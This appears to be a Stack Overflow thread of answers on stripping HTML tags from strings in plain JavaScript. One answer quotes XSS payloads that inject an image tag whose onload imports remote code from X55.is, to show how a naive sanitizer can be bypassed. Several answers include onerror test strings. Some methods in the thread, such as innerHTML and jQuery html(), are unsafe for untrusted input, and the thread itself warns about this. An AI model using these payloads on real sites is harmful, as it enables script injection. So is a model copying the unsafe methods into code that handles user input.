Bryan

Reputation: 17581

Strip HTML tags from text using plain JavaScript

How can I strip HTML tags from a string using plain JavaScript only, without a library?

Upvotes: 868

Views: 939863

Answers (30)

Karl.S

Reputation: 2402

This should work in any JavaScript environment (Node.js included).

    const text = `
    <html lang="en">
      <head>
        <style type="text/css">*{color:red}</style>
        <script>alert('hello')</script>
      </head>
      <body><b>This is some text</b><br/></body>
    </html>`;
    
    // Remove style tags and content ([\s\S]*? also matches across line breaks)
    const stripped = text.replace(/<style[^>]*>[\s\S]*?<\/style>/gi, '')
        // Remove script tags and content
        .replace(/<script[^>]*>[\s\S]*?<\/script>/gi, '')
        // Remove all opening, closing and orphan HTML tags
        .replace(/<[^>]+>/g, '')
        // Remove leading spaces and repeated CR/LF
        .replace(/([\r\n]+ +)+/g, '');

Upvotes: 37

Samuel Eiche

Reputation: 175

To add to the DOMParser solution: our team found that it was still possible to inject a malicious script using the basic solution.

\"><script>document.write('<img src=//X55.is onload=import(src)>');</script>'

\"><script>document.write('\"><script>document.write('\"><img src=//X55.is onload=import(src)>');</script>');</script>

We found that it was best to parse it recursively if any tags still exist after the initial parse.

function stripHTML(str) {
  const parsedHTML = new DOMParser().parseFromString(str, "text/html");
  const text = parsedHTML.body.textContent;

  if (/(<([^>]+)>)/gi.test(text)) {
    return stripHTML(text);
  }

  return text || "";
}
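
A minimal sketch of the same "repeat until nothing changes" idea, written as a loop instead of recursion. It assumes the single-pass stripper is passed in as a function, so the DOMParser-based step above could be plugged in when running in a browser. The regex stripper used here is only a stand-in so the example runs where DOMParser is not available, and the names stripUntilStable, stripInnermostTags and maxPasses are hypothetical.

```javascript
// Stand-in single-pass stripper (an assumption, not the DOMParser step above):
// removes only tags that contain no nested "<" or ">".
function stripInnermostTags(str) {
  return str.replace(/<[^<>]*>/g, '');
}

// Apply stripOnce repeatedly until the output stops changing.
// maxPasses guards against input that never settles.
function stripUntilStable(input, stripOnce, maxPasses = 10) {
  let current = String(input);
  for (let pass = 0; pass < maxPasses; pass++) {
    const next = stripOnce(current);
    if (next === current) {
      return current; // nothing left to strip
    }
    current = next;
  }
  throw new Error('Input did not stabilise within ' + maxPasses + ' passes');
}

// A payload that reassembles into a script tag after one pass.
const payload = '<scr<b>ipt>alert(1)</scr</b>ipt>';

console.log(stripInnermostTags(payload));
// → <script>alert(1)</script>

console.log(stripUntilStable(payload, stripInnermostTags));
// → alert(1)
```

Throwing when the pass limit is reached, rather than returning a half-stripped string, is a design choice of this sketch so that unstable input is never handed on as if it were clean.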

Upvotes: 3

Mariano Argañaraz

Reputation: 1252

Additionally, if you want to strip the HTML from a string and preserve the line breaks, you can use this:

function stripHTML(string) {
  let doc = new DOMParser().parseFromString(string, 'text/html');
  let textLines = [];
  // Collect the text of each top-level node separately
  doc.body.childNodes.forEach((childNode) => {
    textLines.push(childNode.textContent || '');
  });
  let result = textLines.join('<br>');
  return result;
}

Upvotes: 0

Sabaz

Reputation: 5262

I would like to share an edited version of Shog9's accepted answer.

As Mike Samuel pointed out in a comment, that function can execute inline JavaScript code.
But Shog9 is right when saying "let the browser do it for you..."

So here is my edited version, using DOMParser:

function strip(html){
   let doc = new DOMParser().parseFromString(html, 'text/html');
   return doc.body.textContent || "";
}

Here is the code to test the inline JavaScript:

strip("<img onerror='alert(\"could run arbitrary JS here\")' src=bogus>")

Also, it does not request resources (like images) on parse:

strip("Just text <img src='https://assets.rbl.ms/4155638/980x.jpg'>")

Upvotes: 321

AmerllicA

Reputation: 32472

A very good library is sanitize-html, which is pure JavaScript and works in any environment.

My case was on React Native, where I needed to remove all HTML tags from the given texts, so I created this wrapper function:

import sanitizer from 'sanitize-html';

const textSanitizer = (textWithHTML: string): string =>
  sanitizer(textWithHTML, {
    allowedTags: [],
  });

export default textSanitizer;

Now, by using my textSanitizer, I get the pure text contents.

Upvotes: 4

Mahesh

Reputation: 113

You can strip out all the html tags with the following regex: /<(.|\n)*?>/g

Example:

let str = "<font class=\"ClsName\">int[0]</font><font class=\"StrLit\">()</font>";
console.log(str.replace(/<(.|\n)*?>/g, ''));

Output:

int[0]()

Upvotes: 0

Ankit Kumawat

Reputation: 441

const htmlParser= new DOMParser().parseFromString("<h6>User<p>name</p></h6>" , 'text/html');
const textString= htmlParser.body.textContent;
console.log(textString)

Upvotes: 9

Yilmaz

Reputation: 49182

const strip=(text) =>{
    return (new DOMParser()?.parseFromString(text,"text/html"))
    ?.body?.textContent
}

const value=document.getElementById("idOfEl").value

const cleanText=strip(value)

Upvotes: 2

Kody

Reputation: 965

As others suggested, I recommend using DOMParser when possible.

However, if you happen to be working inside a Node/JS Lambda or DOMParser is otherwise not available, I came up with the regex below to match most of the scenarios mentioned in previous answers/comments. It doesn't match &gt; and &lt;, which some others may be concerned about, but it should capture pretty much any other scenario.

const dangerousText = '?';
const htmlTagRegex = /<\/?([a-zA-Z]\s?)*?([a-zA-Z]+?=\s?".*")*?([\s/]*?)>/gi;
const sanitizedText = dangerousText.replace(htmlTagRegex, '');

This might be easy to simplify, but it should work for most situations. Hope it helps someone.

Upvotes: 1

fadi omar

Reputation: 768

const getTextFromHtml = (t) =>
  t
    ?.split('>')
    ?.map((i) => i.split('<')[0])
    .filter((i) => !i.includes('=') && i.trim())
    .join('');

const test = '<p>This <strong>one</strong> <em>time</em>,</p><br /><blockquote>I went to</blockquote><ul><li>band <a href="https://workingclasshistory.com" rel="noopener noreferrer" target="_blank">camp</a>…</li></ul><p>I edited this as a reviewer just to double check</p>'

getTextFromHtml(test)
  // 'This onetime,I went toband camp…I edited this as a reviewer just to double check'

Upvotes: 1

Johannes Fahrenkrug

Reputation: 44700

It is also possible to use the fantastic htmlparser2 pure JS HTML parser. Here is a working demo:

var htmlparser = require('htmlparser2');

var body = '<p><div>This is </div>a <span>simple </span> <img src="test"></img>example.</p>';

var result = [];

var parser = new htmlparser.Parser({
    ontext: function(text){
        result.push(text);
    }
}, {decodeEntities: true});

parser.write(body);
parser.end();

result.join('');

The output will be This is a simple example.

See it in action here: https://tonicdev.com/jfahrenkrug/extract-text-from-html

This works in both node and the browser if you pack your web application using a tool like webpack.

Upvotes: 6

Johnny Oshika

Reputation: 57482

This package works really well for stripping HTML: https://www.npmjs.com/package/string-strip-html

It works in both the browser and on the server (e.g. Node.js).

Upvotes: 0

jnaklaas

Reputation: 1769

If you don't want to create a DOM for this (perhaps you're not in a browser context) you could use the striptags npm package.

import striptags from 'striptags'; //ES6 <-- pick one
const striptags = require('striptags'); //ES5 <-- pick one

striptags('<p>An HTML string</p>');

Upvotes: 2

Saurabh Dixit

Reputation: 11

var STR='<Your HTML STRING>';
var HTMLParsedText="";
   var resultSet =  STR.split('>')
   var resultSetLength =resultSet.length
   var counter=0
   while(resultSetLength>0)
   {
      if(resultSet[counter].indexOf('<')>0)
      {    
        var value = resultSet[counter];
        value=value.substring(0, resultSet[counter].indexOf('<'))
        if (resultSet[counter].indexOf('&')>=0 && resultSet[counter].indexOf(';')>=0) {
            value=value.replace(value.substring(resultSet[counter].indexOf('&'), resultSet[counter].indexOf(';')+1),'')
        }
      }
        if (value)
        {
          value = value.trim();
          if(HTMLParsedText === "")
          {
              HTMLParsedText = value;
          }
          else
          {
            if (value) {
              HTMLParsedText = HTMLParsedText + "\n" + value;
            }
          }
          value='';
        }
        counter= counter+1;
      resultSetLength=resultSetLength-1;
   }
  console.log(HTMLParsedText);

Upvotes: 0

Anatol Zakrividoroga

Reputation: 4518

From CSS-Tricks:

https://css-tricks.com/snippets/javascript/strip-html-tags-in-javascript/

const originalString = `
  <div>
    <p>Hey that's <span>somthing</span></p>
  </div>
`;

const strippedString = originalString.replace(/(<([^>]+)>)/gi, "");

console.log(strippedString);

Upvotes: 16

user999305

Reputation: 1013

As an extension to the jQuery method: if your string might not contain HTML (e.g. if you are trying to remove HTML from a form field), then

jQuery(html).text();

will return an empty string if there is no HTML

Use:

jQuery('<p>' + html + '</p>').text();

instead.

Update: As has been pointed out in the comments, in some circumstances this solution will execute JavaScript contained within html. If the value of html could be influenced by an attacker, use a different solution.

Upvotes: 61

Shog9

Reputation: 159590

If you're running in a browser, then the easiest way is just to let the browser do it for you...

function stripHtml(html)
{
   let tmp = document.createElement("DIV");
   tmp.innerHTML = html;
   return tmp.textContent || tmp.innerText || "";
}

Note: as folks have noted in the comments, this is best avoided if you don't control the source of the HTML (for example, don't run this on anything that could've come from user input). For those scenarios, you can still let the browser do the work for you: see Sabaz's answer on using the now widely available DOMParser.

Upvotes: 916

AkshayBandivadekar

Reputation: 840

For an easier solution, try this: https://css-tricks.com/snippets/javascript/strip-html-tags-in-javascript/

var StrippedString = OriginalString.replace(/(<([^>]+)>)/ig,"");

Upvotes: 6

SwiftNinjaPro

Reputation: 853

Method 1:

function cleanHTML(str){
  // Escape the angle brackets of each tag instead of removing the tag
  return str.replace(/<(?<=<)(.*?)(?=>)>/g, '&lt;$1&gt;');
}

function uncleanHTML(str){
  return str.replace(/&lt;(?<=&lt;)(.*?)(?=&gt;)&gt;/g, '<$1>');
}

Method 2:

function cleanHTML(str){
  // Escape every angle bracket, whether or not it belongs to a tag
  return str.replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

function uncleanHTML(str){
  return str.replace(/&lt;/g, '<').replace(/&gt;/g, '>');
}

Also, don't forget that if the user happens to post a math comment (e.g. 1 < 2), you don't want to strip the whole comment. The browser (only tested in Chrome) doesn't interpret character entities as HTML tags. If you replace every < with &lt; everywhere in the string, the entity will display as < in the text without running any HTML. I recommend method 2. jQuery also works well: $('#element').text();
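
As a sketch of the escaping approach in method 2, the helper below also escapes &, " and ', which matters if the text may end up inside an attribute value or already contains entities. The name escapeHtml and the HTML_ESCAPES table are illustrative only and do not come from any library.

```javascript
// Hypothetical lookup table: each special character and its entity.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Replace every special character in a single pass, so an "&" that is
// produced by an earlier replacement is never escaped a second time.
function escapeHtml(str) {
  return String(str).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

console.log(escapeHtml('1 < 2 & 3 > 2'));
// → 1 &lt; 2 &amp; 3 &gt; 2
```

Doing the replacement in one pass avoids the ordering problem of chained .replace() calls, where escaping & last would mangle the entities produced by the earlier steps.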

Upvotes: 0

nickf

Reputation: 545975

myString.replace(/<[^>]*>?/gm, '');

Upvotes: 805

nickl-

Reputation: 8721

A safer way to strip the html with jQuery is to first use jQuery.parseHTML to create a DOM, ignoring any scripts, before letting jQuery build an element and then retrieving only the text.

function stripHtml(unsafe) {
    return $($.parseHTML(unsafe)).text();
}

Can safely strip html from:

<img src="unknown.gif" onerror="console.log('running injections');">

And other exploits.

nJoy!

Upvotes: 2

sonichy

Reputation: 1478

https://developer.mozilla.org/en-US/docs/Web/API/Element/insertAdjacentHTML

var div = document.getElementsByTagName('div');
for (var i=0; i<div.length; i++) {
    div[i].insertAdjacentHTML('afterend', div[i].innerHTML);
    document.body.removeChild(div[i]);
}

Upvotes: 0

Janghou

Reputation: 1843

An improvement to the accepted answer.

function strip(html)
{
   var tmp = document.implementation.createHTMLDocument("New").body;
   tmp.innerHTML = html;
   return tmp.textContent || tmp.innerText || "";
}

This way, running something like this will do no harm:

strip("<img onerror='alert(\"could run arbitrary JS here\")' src=bogus>")

Firefox, Chromium and Internet Explorer 9+ are safe. Opera Presto is still vulnerable. Also, images mentioned in the strings are not downloaded in Chromium and Firefox, which saves HTTP requests.

Upvotes: 37

hegemon

Reputation: 6764

var text = html.replace(/<\/?("[^"]*"|'[^']*'|[^>])*(>|$)/g, "");

This is a regex version, which is more resilient to malformed HTML, like:

Unclosed tags

Some text <img

"<", ">" inside tag attributes

Some text <img alt="x > y">

Newlines

Some <a href="http://google.com">

The code

var html = '<br>This <img alt="a>b" \r\n src="a_b.gif" />is > \nmy<>< > <a>"text"</a'
var text = html.replace(/<\/?("[^"]*"|'[^']*'|[^>])*(>|$)/g, "");
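
To see the difference, here is a small comparison against the simpler /<[^>]+>/g pattern on the three malformed cases listed above. The sample strings and the names stripNaive and stripQuoteAware are made up for illustration.

```javascript
// Simple pattern: a tag is everything from "<" up to the first ">".
function stripNaive(html) {
  return html.replace(/<[^>]+>/g, '');
}

// Pattern from this answer: quoted attribute values are consumed as a unit,
// and an unclosed tag is allowed to run to the end of the input.
function stripQuoteAware(html) {
  return html.replace(/<\/?("[^"]*"|'[^']*'|[^>])*(>|$)/g, '');
}

const unclosed = 'Some text <img';
const quoted = 'Some text <img alt="x > y">';
const multiline = 'Some <a\nhref="http://google.com">link</a>';

console.log(JSON.stringify(stripNaive(unclosed)));      // → "Some text <img"
console.log(JSON.stringify(stripQuoteAware(unclosed))); // → "Some text "

console.log(JSON.stringify(stripNaive(quoted)));        // → "Some text  y\">"
console.log(JSON.stringify(stripQuoteAware(quoted)));   // → "Some text "

console.log(JSON.stringify(stripNaive(multiline)));      // → "Some link"
console.log(JSON.stringify(stripQuoteAware(multiline))); // → "Some link"
```

Both patterns cope with the newline case, since [^>] also matches line breaks. They differ only on the unclosed tag and on the > inside an attribute value.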

Upvotes: 22

function strip_html_tags(str)
{
   if ((str === null) || (str === ''))
      return false;
   str = str.toString();
   return str.replace(/<[^>]*>/g, '');
}

Upvotes: -1

Mike Datsko

Reputation: 170

An input element supports only single-line text:

The text state represents a one line plain text edit control for the element's value.

function stripHtml(str) {
  var tmp = document.createElement('input');
  tmp.value = str;
  return tmp.value;
}

Update: this works as expected

function stripHtml(str) {
  // Remove some tags
  str = str.replace(/<[^>]+>/gim, '');

  // Remove BB code
  str = str.replace(/\[(\w+)[^\]]*](.*?)\[\/\1]/g, '$2 ');

  // Remove html and line breaks
  const div = document.createElement('div');
  div.innerHTML = str;

  const input = document.createElement('input');
  input.value = div.textContent || div.innerText || '';

  return input.value;
}

Upvotes: 1

Harry Stevens

Reputation: 1423

A lot of people have answered this already, but I thought it might be useful to share the function I wrote that strips HTML tags from a string but allows you to include an array of tags that you do not want stripped. It's pretty short and has been working nicely for me.

function removeTags(string, array){
  return array ? string.split("<").filter(function(val){ return f(array, val); }).map(function(val){ return f(array, val); }).join("") : string.split("<").map(function(d){ return d.split(">").pop(); }).join("");
  function f(array, value){
    return array.map(function(d){ return value.includes(d + ">"); }).indexOf(true) != -1 ? "<" + value : value.split(">")[1];
  }
}

var x = "<span><i>Hello</i> <b>world</b>!</span>";
console.log(removeTags(x)); // Hello world!
console.log(removeTags(x, ["span", "i"])); // <span><i>Hello</i> world!</span>

Upvotes: 5

Mathieu Paturel

Reputation: 4500

Using jQuery:

function stripTags(textToEscape) {
    return $('<p></p>').html(textToEscape).text();
}

Upvotes: 1

Abhishek Dhanraj Shahdeo

Reputation: 1356

This also handles escaped angle brackets (&lt; and &gt;), using pattern matching:

myString.replace(/(?:&lt;|<)(?:.|\n)*?(?:&gt;|>)/gm, '');

Upvotes: 0

gyula.nemeth

Reputation: 867

If you want to keep the links and the structure of the content (h1, h2, etc.), then you should check out TextVersionJS. You can use it with any HTML, although it was created to convert an HTML email to plain text.

The usage is very simple. For example, in Node.js:

var createTextVersion = require("textversionjs");
var yourHtml = "<h1>Your HTML</h1><ul><li>goes</li><li>here.</li></ul>";

var textVersion = createTextVersion(yourHtml);

Or in the browser with pure js:

<script src="textversion.js"></script>
<script>
  var yourHtml = "<h1>Your HTML</h1><ul><li>goes</li><li>here.</li></ul>";
  var textVersion = createTextVersion(yourHtml);
</script>

It also works with require.js:

define(["textversionjs"], function(createTextVersion) {
  var yourHtml = "<h1>Your HTML</h1><ul><li>goes</li><li>here.</li></ul>";
  var textVersion = createTextVersion(yourHtml);
});

Upvotes: 7
